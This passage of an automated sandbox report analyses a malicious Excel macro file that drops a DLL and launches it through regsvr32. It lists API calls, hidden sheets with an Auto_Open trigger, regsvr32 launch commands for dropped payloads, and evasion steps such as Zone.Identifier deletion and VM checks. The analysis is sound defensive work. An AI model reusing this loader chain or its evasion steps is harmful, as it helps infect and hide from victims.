                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_001E186B9_2_001E186B
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_001F70989_2_001F7098
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_001F6E979_2_001F6E97
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_001F30949_2_001F3094
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_001E188C9_2_001E188C
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_001F3E899_2_001F3E89
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_001F92859_2_001F9285
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_001FA6839_2_001FA683
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_001ED4BC9_2_001ED4BC
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_001EAEBB9_2_001EAEBB
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_001FD4AE9_2_001FD4AE
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_001EA4DE9_2_001EA4DE
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_001FFAD19_2_001FFAD1
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_001F66C89_2_001F66C8
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_001FEEC29_2_001FEEC2
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_001F8EF89_2_001F8EF8
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_001E22F79_2_001E22F7
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_001EE4F59_2_001EE4F5
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_001F86EE9_2_001F86EE
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_001EC4E59_2_001EC4E5
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_001F2B1F9_2_001F2B1F
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_001FA9169_2_001FA916
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_001EBB149_2_001EBB14
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_001E43139_2_001E4313
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_001E27109_2_001E2710
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_001F490E9_2_001F490E
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_001FAF0B9_2_001FAF0B
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_001EED0A9_2_001EED0A
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_001F05039_2_001F0503
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_001E2F369_2_001E2F36
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_001F77309_2_001F7730
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_001FDF2B9_2_001FDF2B
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_001F1B299_2_001F1B29
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_001E3F5A9_2_001E3F5A
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_001EC1519_2_001EC151
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_001E93439_2_001E9343
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_001FE1689_2_001FE168
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_001F89669_2_001F8966
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_001FBD639_2_001FBD63
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_001E77619_2_001E7761
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_001F7B9E9_2_001F7B9E
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_001F519C9_2_001F519C
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_001F69989_2_001F6998
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_001E958A9_2_001E958A
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_002023B99_2_002023B9
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_001F39839_2_001F3983
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_001F27839_2_001F2783
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_001FF9AF9_2_001FF9AF
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_001F35A39_2_001F35A3
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_001FCFA09_2_001FCFA0
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_001FF5D99_2_001FF5D9
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_001F17D29_2_001F17D2
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_001EA9CF9_2_001EA9CF
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_001E1DCA9_2_001E1DCA
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_002005F69_2_002005F6
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_00201FC79_2_00201FC7
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_001FF7F49_2_001FF7F4
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_001FE5ED9_2_001FE5ED
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_001E71E39_2_001E71E3
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_001ECDE09_2_001ECDE0
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 10_2_0026303A10_2_0026303A
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 10_2_00280E7A10_2_00280E7A
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 10_2_00281E4910_2_00281E49
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 10_2_0026884410_2_00268844
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 10_2_0026364E10_2_0026364E
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 10_2_00274E5410_2_00274E54
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 10_2_002650CF10_2_002650CF
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 10_2_0027FECB10_2_0027FECB
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 10_2_002682D210_2_002682D2
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 10_2_0027813110_2_00278131
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 10_2_0027416E10_2_0027416E
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 10_2_00264B4010_2_00264B40
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 10_2_0027D15E10_2_0027D15E
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 10_2_002813A310_2_002813A3
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 10_2_00268FE910_2_00268FE9
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 10_2_0027323110_2_00273231
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 10_2_00277E3D10_2_00277E3D
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 10_2_0026CA3C10_2_0026CA3C
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 10_2_00281A0A10_2_00281A0A
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 10_2_00280A0110_2_00280A01
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 10_2_00279A0C10_2_00279A0C
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 10_2_0026701310_2_00267013
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 10_2_00269C1B10_2_00269C1B
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 10_2_0026806B10_2_0026806B
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 10_2_0026186B10_2_0026186B
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 10_2_0027604B10_2_0027604B
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 10_2_0027905410_2_00279054
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 10_2_00261A5F10_2_00261A5F
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 10_2_0026E65A10_2_0026E65A
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 10_2_0027D4AE10_2_0027D4AE
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 10_2_0026D4BC10_2_0026D4BC
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 10_2_0026AEBB10_2_0026AEBB
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 10_2_0027928510_2_00279285
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 10_2_0027A68310_2_0027A683
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 10_2_0026188C10_2_0026188C
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 10_2_00273E8910_2_00273E89
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 10_2_00276E9710_2_00276E97
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 10_2_0027309410_2_00273094
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 10_2_0027709810_2_00277098
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 10_2_0026C4E510_2_0026C4E5
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 10_2_002786EE10_2_002786EE
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 10_2_002622F710_2_002622F7
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 10_2_0026E4F510_2_0026E4F5
                        Source: 8833.tmp.0.dr OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
                        Source: Documento.xlsm Macro extractor: Sheet name: Br1
                        Source: Documento.xlsm Macro extractor: Sheet name: Br2
                        Source: Documento.xlsm Macro extractor: Sheet name: EFWFSFG
                        Source: BRqk58WkNweubruYwrLOt[1].dll.0.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                        Source: BRqk58WkNweubruYwrLOt[1].dll.0.dr Static PE information: Resource name: None type: GLS_BINARY_LSB_FIRST
                        Source: xxw1.ocx.0.dr Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
                        Source: xxw1.ocx.0.dr Static PE information: Resource name: None type: GLS_BINARY_LSB_FIRST
                        Source: workbook.xmlBinary string: <workbook xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" mc:Ignorable="x15 xr xr6 xr10 xr2" xmlns:x15="http://schemas.microsoft.com/office/spreadsheetml/2010/11/main" xmlns:xr="http://schemas.microsoft.com/office/spreadsheetml/2014/revision" xmlns:xr6="http://schemas.microsoft.com/office/spreadsheetml/2016/revision6" xmlns:xr10="http://schemas.microsoft.com/office/spreadsheetml/2016/revision10" xmlns:xr2="http://schemas.microsoft.com/office/spreadsheetml/2015/revision2"><fileVersion appName="xl" lastEdited="7" lowestEdited="7" rupBuild="22527"/><workbookPr defaultThemeVersion="166925"/><mc:AlternateContent xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006"><mc:Choice Requires="x15"><x15ac:absPath url="C:\Users\Admin\Desktop\File\23f\Cir-ZV\CIR\" xmlns:x15ac="http://schemas.microsoft.com/office/spreadsheetml/2010/11/ac"/></mc:Choice></mc:AlternateContent><xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{39997D78-22C7-4743-8ECE-3023C34473AE}" xr6:coauthVersionLast="45" xr6:coauthVersionMax="45" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/><bookViews><workbookView xWindow="-120" yWindow="-120" windowWidth="20730" windowHeight="11160" firstSheet="1" activeTab="1" xr2:uid="{00000000-000D-0000-FFFF-FFFF00000000}"/></bookViews><sheets><sheet name="Grrr1" sheetId="2" state="hidden" r:id="rId1"/><sheet name="Sheet" sheetId="11" r:id="rId2"/><sheet name="Sbrr1" sheetId="3" state="hidden" r:id="rId3"/><sheet name="EFWFSFG" sheetId="8" state="hidden" r:id="rId4"/><sheet name="Br1" sheetId="4" state="hidden" r:id="rId5"/><sheet name="Br2" sheetId="5" state="hidden" r:id="rId6"/></sheets><definedNames><definedName name="DDDDD1">#REF!</definedName><definedName name="DDWD">EFWFSFG!$D$15</definedName><definedName 
name="DDWD1">EFWFSFG!$D$17</definedName><definedName name="DDWD2">EFWFSFG!$D$19</definedName><definedName name="DDWD3">EFWFSFG!$D$21</definedName><definedName name="DDWD4">EFWFSFG!$D$23</definedName><definedName name="DDWD8">EFWFSFG!$D$13</definedName><definedName name="KKLD8">#REF!</definedName><definedName name="_xlnm.Auto_Open">EFWFSFG!$D$1</definedName></definedNames><calcPr calcId="191029"/><extLst><ext uri="{B58B0392-4F1F-4190-BB64-5DF3571DCE5F}" xmlns:xcalcf="http://schemas.microsoft.com/office/spreadsheetml/2018/calcfeatures"><xcalcf:calcFeatures><xcalcf:feature name="microsoft.com:RD"/><xcalcf:feature name="microsoft.com:FV"/></xcalcf:calcFeatures></ext></extLst></workbook>
                        Source: C:\Windows\SysWOW64\regsvr32.exe Memory allocated: 76F90000 page execute and read and write
                        Source: C:\Windows\SysWOW64\regsvr32.exe Memory allocated: 76E90000 page execute and read and write
                        Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_1000F3A0 GetLogicalDriveStringsA,GetLogicalDriveStringsA,GetLogicalDriveStringsA,GetLogicalDriveStringsA,GetLogicalDriveStringsA,GetLogicalDriveStringsA,GetDriveTypeA,GetDriveTypeA,GetWindowsDirectoryA,GetSystemDirectoryA,_strcspn,TerminateThread,SendMessageA,ExitWindowsEx
                        Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_1000FA35 GetLogicalDriveStringsA,GetLogicalDriveStringsA,GetLogicalDriveStringsA,GetDriveTypeA,GetDriveTypeA,TerminateThread,SendMessageA,ExitWindowsEx
                        Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_1000FAC4 GetLogicalDriveStringsA,GetLogicalDriveStringsA,GetLogicalDriveStringsA,GetDriveTypeA,GetDriveTypeA,TerminateThread,SendMessageA,ExitWindowsEx
                        Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_1000FFB0 SendMessageA,SendMessageA,TerminateThread,SendMessageA,ExitWindowsEx
                        Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_1001005E SendMessageA,SendMessageA,TerminateThread,SendMessageA,ExitWindowsEx
                        Source: C:\Windows\SysWOW64\regsvr32.exe File created: C:\Windows\SysWOW64\Lublsqnpkfxznyn\
                        Source: C:\Windows\SysWOW64\regsvr32.exe Code function: String function: 1003D219 appears 43 times
                        Source: C:\Windows\SysWOW64\regsvr32.exe Code function: String function: 1003D578 appears 76 times
                        Source: C:\Windows\SysWOW64\regsvr32.exe Code function: String function: 10001470 appears 34 times
                        Source: C:\Windows\SysWOW64\regsvr32.exe Code function: String function: 100171AA appears 37 times
                        Source: C:\Windows\SysWOW64\regsvr32.exe Code function: String function: 1003D1E6 appears 172 times
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Desktop\~$Documento.xlsm
                        Source: classification engine Classification label: mal100.troj.expl.evad.winXLSM@19/11@1/45
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini
                        Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 3_2_10009DB0 CreateWindowExW,CreateWindowExW,GetLastError,ShowWindow,ShowWindow,CreateWindowExA,ShowWindow,CreateWindowExW,GetLastError,ShowWindow,CreateWindowExA,ShowWindow,FindResourceW,LoadResource,SizeofResource,VirtualAllocExNuma,VirtualAlloc,memcpy,malloc,??3@YAXPAX@Z,_printf
                        Source: Documento.xlsm Virustotal: Detection: 40%
                        Source: Documento.xlsm ReversingLabs: Detection: 39%
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
                        Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWow64\regsvr32.exe /s ..\xxw1.ocx
                        Source: C:\Windows\SysWOW64\regsvr32.exe Process created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Lublsqnpkfxznyn\qzdpzpnlmhwmidn.sqj"
                        Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Akqqkkcyjpzjtkdl\yjsihfoifzocxh.bje"
                        Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Jlwcmhlugcekbvod\wgwqcgkqco.zkn"
                        Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Wjoyn\vwxqtwr.dtt"
                        Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Fypgzmyquzzcde\otyatzrmngwq.ngt"
                        Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Bwfagqlayjve\vhxv.yyo"
                        Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Wajwuevzvdakzef\rsarmrhrfymvh.bdv"
                        Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe C:\Windows\SysWOW64\regsvr32.exe /s "C:\Windows\SysWOW64\Qqnrprjtrrtdhqc\hwfqlqeqb.xee"
                        Source: C:\Windows\SysWOW64\regsvr32.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{1F486A52-3CB1-48FD-8F50-B8DC300D9F9D}\InProcServer32Jump to behavior
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_1000D150 SendMessageA,SendMessageA,SendMessageA,LoadIconA,LoadIconA,LoadIconA,LoadIconA,LoadIconA,LoadIconA,LoadIconA,LoadIconA,SendMessageA,GetLogicalDriveStringsA,GetLogicalDriveStringsA,SHGetFileInfoA,SendMessageA,SHGetFileInfoA,LoadIconA,LoadIconA,LoadIconA,LoadIconA,LoadIconA,LoadIconA,LoadIconA,SendMessageA,LoadCursorA,CopyIcon,LoadCursorFromFileA,ShowCursor,ShowCursor,SetSystemCursor,ShowCursor,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,LoadMenuA,LoadIconA,_strncpy,VariantClear,VariantClear,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,VariantClear,VariantClear,VariantClear,VariantClear,3_2_1000D150
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRE233.tmpJump to behavior
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 11_2_0024BE5E CreateToolhelp32Snapshot,11_2_0024BE5E
                        Source: C:\Windows\SysWOW64\regsvr32.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
                        Source: Window RecorderWindow detected: More than 3 window changes detected
                        Source: Documento.xlsmInitial sample: OLE zip file path = xl/worksheets/_rels/sheet2.xml.rels
                        Source: Documento.xlsmInitial sample: OLE zip file path = xl/calcChain.xml
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
                        Source: 8833.tmp.0.drInitial sample: OLE indicators vbamacros = False
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_1003D2BE push ecx; ret 3_2_1003D2D1
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_1003D5BD push ecx; ret 3_2_1003D5D0
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_1004BC5B LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__invoke_watson,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__invoke_watson,__decode_pointer,__decode_pointer,__decode_pointer,3_2_1004BC5B
                        Source: xxw1.ocx.0.drStatic PE information: real checksum: 0xb1065 should be: 0xabcb9
                        Source: BRqk58WkNweubruYwrLOt[1].dll.0.drStatic PE information: real checksum: 0xb1065 should be: 0xabcb9
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\xxw1.ocxJump to dropped file
                        Source: C:\Windows\SysWOW64\regsvr32.exeFile created: C:\Windows\SysWOW64\Lublsqnpkfxznyn\qzdpzpnlmhwmidn.sqj (copy)Jump to dropped file
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\BRqk58WkNweubruYwrLOt[1].dllJump to dropped file

                        Boot Survival

                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\xxw1.ocxJump to dropped file

                        Hooking and other Techniques for Hiding and Protection

                        Source: C:\Windows\SysWOW64\regsvr32.exeFile opened: C:\Windows\SysWOW64\Lublsqnpkfxznyn\qzdpzpnlmhwmidn.sqj:Zone.Identifier read attributes | deleteJump to behavior
                        Source: C:\Windows\SysWOW64\regsvr32.exeFile opened: C:\Windows\SysWOW64\Akqqkkcyjpzjtkdl\yjsihfoifzocxh.bje:Zone.Identifier read attributes | deleteJump to behavior
                        Source: C:\Windows\SysWOW64\regsvr32.exeFile opened: C:\Windows\SysWOW64\Jlwcmhlugcekbvod\wgwqcgkqco.zkn:Zone.Identifier read attributes | deleteJump to behavior
                        Source: C:\Windows\SysWOW64\regsvr32.exeFile opened: C:\Windows\SysWOW64\Wjoyn\vwxqtwr.dtt:Zone.Identifier read attributes | deleteJump to behavior
                        Source: C:\Windows\SysWOW64\regsvr32.exeFile opened: C:\Windows\SysWOW64\Fypgzmyquzzcde\otyatzrmngwq.ngt:Zone.Identifier read attributes | deleteJump to behavior
                        Source: C:\Windows\SysWOW64\regsvr32.exeFile opened: C:\Windows\SysWOW64\Bwfagqlayjve\vhxv.yyo:Zone.Identifier read attributes | deleteJump to behavior
                        Source: C:\Windows\SysWOW64\regsvr32.exeFile opened: C:\Windows\SysWOW64\Wajwuevzvdakzef\rsarmrhrfymvh.bdv:Zone.Identifier read attributes | deleteJump to behavior
                        Source: C:\Windows\SysWOW64\regsvr32.exeFile opened: C:\Windows\SysWOW64\Qqnrprjtrrtdhqc\hwfqlqeqb.xee:Zone.Identifier read attributes | deleteJump to behavior
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_100175E3 IsIconic,GetWindowPlacement,GetWindowRect,3_2_100175E3
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_1000B6D0 IsIconic,SendMessageA,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetClientRect,DrawIcon,3_2_1000B6D0
                        Source: C:\Windows\SysWOW64\regsvr32.exeRegistry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRootJump to behavior
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                        Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1124Thread sleep time: -60000s >= -30000sJump to behavior
                        Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2028Thread sleep time: -120000s >= -30000sJump to behavior
                        Source: C:\Windows\SysWOW64\regsvr32.exe TID: 172Thread sleep time: -120000s >= -30000sJump to behavior
                        Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2576Thread sleep time: -240000s >= -30000sJump to behavior
                        Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1160Thread sleep time: -60000s >= -30000sJump to behavior
                        Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2128Thread sleep time: -240000s >= -30000sJump to behavior
                        Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2556Thread sleep time: -60000s >= -30000sJump to behavior
                        Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3064Thread sleep time: -180000s >= -30000sJump to behavior
                        Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2688Thread sleep time: -240000s >= -30000sJump to behavior
                        Source: C:\Windows\SysWOW64\regsvr32.exeAPI coverage: 3.0 %
                        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\BRqk58WkNweubruYwrLOt[1].dllJump to dropped file
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_1000D150 SendMessageA,SendMessageA,SendMessageA,LoadIconA,LoadIconA,LoadIconA,LoadIconA,LoadIconA,LoadIconA,LoadIconA,LoadIconA,SendMessageA,GetLogicalDriveStringsA,GetLogicalDriveStringsA,SHGetFileInfoA,SendMessageA,SHGetFileInfoA,LoadIconA,LoadIconA,LoadIconA,LoadIconA,LoadIconA,LoadIconA,LoadIconA,SendMessageA,LoadCursorA,CopyIcon,LoadCursorFromFileA,ShowCursor,ShowCursor,SetSystemCursor,ShowCursor,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,LoadMenuA,LoadIconA,_strncpy,VariantClear,VariantClear,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,VariantClear,VariantClear,VariantClear,VariantClear,3_2_1000D150
                        Source: C:\Windows\SysWOW64\regsvr32.exeAPI call chain: ExitProcess graph end nodegraph_3-45221
                        Source: C:\Windows\SysWOW64\regsvr32.exeAPI call chain: ExitProcess graph end nodegraph_3-45163
                        Source: C:\Windows\SysWOW64\regsvr32.exeAPI call chain: ExitProcess graph end nodegraph_3-44544
                        Source: regsvr32.exe, 00000008.00000002.467854306.00000000005B3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: ECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
                        Source: regsvr32.exe, 00000009.00000002.473212441.0000000000733000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
                        Source: C:\Windows\SysWOW64\regsvr32.exeProcess information queried: ProcessInformationJump to behavior
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_1003CAA2 VirtualQuery,GetSystemInfo,__invoke_watson,GetModuleHandleA,GetProcAddress,VirtualAlloc,VirtualProtect,3_2_1003CAA2
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_1002084E __EH_prolog3,GetFullPathNameA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,3_2_1002084E
                        Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 3_2_1002A9C8 LoadIconA,FindFirstFileA,GetLastError,lstrlenA,SetLastError,__fullpath,__splitpath_s,__makepath_s,3_2_1002A9C8
